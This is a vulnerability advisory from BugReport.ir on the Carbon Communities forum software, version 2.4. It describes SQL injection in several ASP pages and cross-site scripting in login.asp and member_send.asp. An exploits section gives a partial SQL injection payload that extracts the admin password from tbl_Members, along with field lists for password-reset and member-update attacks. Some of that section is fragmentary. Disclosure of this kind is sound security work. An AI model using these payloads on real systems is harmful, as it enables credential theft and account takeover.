########################## www.BugReport.ir ####################################### # # AmnPardaz Security Research Team # # Title: Multiple Vulnerabilities in Carbon Communities forum. # Vendor: www.carboncommunities.com # Vulnerable Version: 2.4 and prior versions # Exploit: Available # Impact: High # Fix: N/A # Original Advisory: http://bugreport.ir/index.php?/35 ################################################################################### #################### 1. Description: #################### Carbon Communities is a high powered, fully scalable, and highly customizable online portal, message boards/ bulletin board, discussion hub, Private messaging, Event Calendars, Emails and chat software rolled into one. #################### 2. Vulnerability: #################### 2.1. There is a SQL Injection in "events.asp?id=[Injection]". By using it, attacker can gain usernames and passwords. 2.1.1. POC: Check exploits section. 2.2. There is a SQL Injection in "getpassword.asp". By using it, attacker can send any password to his/her email address.(exploit available) 2.2.1. POC: Check exploits section. 2.3. There is a SQL Injection in "option_Update.asp". By using it, attacker can update member info.(exploit available) 2.3.1. POC: Check exploits section. 2.4. There are some XSS in "login.asp" and "member_send.asp". 2.4.1. POC: /login.asp?Redirect='>Password= '%2bmember_password,1,1,1,1,1,1,1 from tbl_Members where member_name = 'admin' ------------- 3.2. Attacker can send any password to his/her email address: -------------
UserName:
EMail:
------------- 3.3. Attacker can update member info.: -------------
ID
Member_Cookies
Member_SystemCookies
Member_Center
Member_EmailTheadResponse
Member_EmailPostResponse
Member_WeekStart
Member_ThreadDays
Member_ThreadView
Member_Invisible
Member_HiddenEmail
Member_ReceivePM
Member_PMEmailNotice
Member_PMPopup
Member_Newsletter
Member_TimeZone
Member_DefaultColor
------------- #################### 4. Solution: #################### Edit the source code to ensure that inputs are properly sanitised. #################### - Credit : #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com